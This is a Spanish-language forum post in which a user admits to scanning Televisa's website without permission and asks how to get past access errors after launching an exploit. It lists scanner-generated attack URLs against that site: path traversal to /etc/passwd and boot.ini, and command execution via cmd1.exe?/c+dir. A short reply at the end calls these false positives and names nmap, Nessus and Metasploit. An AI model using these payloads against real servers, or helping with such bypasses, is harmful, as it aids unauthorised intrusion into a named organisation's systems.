hola, soy nuevo jeje, pero bueno, espero que me ayuden , bueno eh hecho una auditoria de seguridad en la pagina web de televisa (obviamente sin permiso) y bueno encontré aproximadamente 252 bugs de las cuales unos 60 son de gravedad, la mayoria de los bugs tiene la vulnerabilidad de unicode,  con solo ir a la direccion que te dice el script arrogado puedes ver el disco duro y agregando otros parametros puedes transferir un archivo mediante TFTP, pero bueno, al ir a dicho link  no me permite ver lo que tiene, ya que tiene un molesto mensaje que dice, el documento que intento buscar no existe en nuestro servidor o no tiene permiso para acceder a el. bueno que puedo hacer para saltarme esto, por cierto ya lanze un exploit contra el servidor pero me arroga el mismo error, cuando trato de conectar con dichos links me dice lo mismo, bueno aqui les dejo los links

http://www.televisa.com/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd


http://www.televisa.com/cgi-bin/w3-msql


http://www.televisa.com/cgi-bin/cmd1.exe?/c+dir


http://www.televisa.com/cgi-bin/websync.exe?ed=&Es=7x1x101&un=nahual&hn=lab&rpt=/scheduler/En_US/WebResources&cbn=/cgi-bin/websync.exe&dow=sun&dmy=Off&tfh=Off&lan=En_US&ix=0&amd=2&epw=WiXwWFp&mrd=-1&mrc=0&mrb=0&bnv=9&ds=7x1x101&tzs=PST8PDT


http://www.televisa.com/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories


buenos son algunos de 60 links, esta claro que el servidor se trata de windows, ya que estuve estudiando los links y te manejan dll y exe


salu2 espero que me ayuden

gracias

pz obvio, usa varios scanner, ya habia podido vulnerar servidores, con metasploit,

mira, utilizo  nmap+nessus+metasploit 

los scaneres sueltan muchos falsos positivos, entre ellos todos los que has puesto